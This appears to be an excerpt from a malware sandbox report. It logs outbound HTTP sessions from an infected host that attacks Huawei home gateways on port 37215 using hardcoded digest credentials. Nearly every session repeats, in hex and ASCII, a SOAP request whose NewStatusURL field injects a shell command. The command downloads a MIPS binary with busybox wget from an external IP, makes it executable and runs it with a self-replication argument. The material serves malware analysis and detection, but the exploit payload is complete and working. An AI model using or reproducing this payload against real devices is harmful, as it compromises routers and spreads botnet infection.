                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2242192.168.2.233872441.250.97.3537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577020884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2243192.168.2.2355820197.221.96.18037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577060938 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2244192.168.2.235356841.254.230.8337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577100992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2245192.168.2.234408241.127.95.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577107906 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2246192.168.2.235881051.135.117.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577128887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2247192.168.2.2341686197.178.148.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577137947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2248192.168.2.2354424197.72.19.18737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577194929 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2249192.168.2.235263689.37.140.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577212095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2250192.168.2.2359126135.203.236.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577241898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2251192.168.2.2358906197.2.86.23337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.577248096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
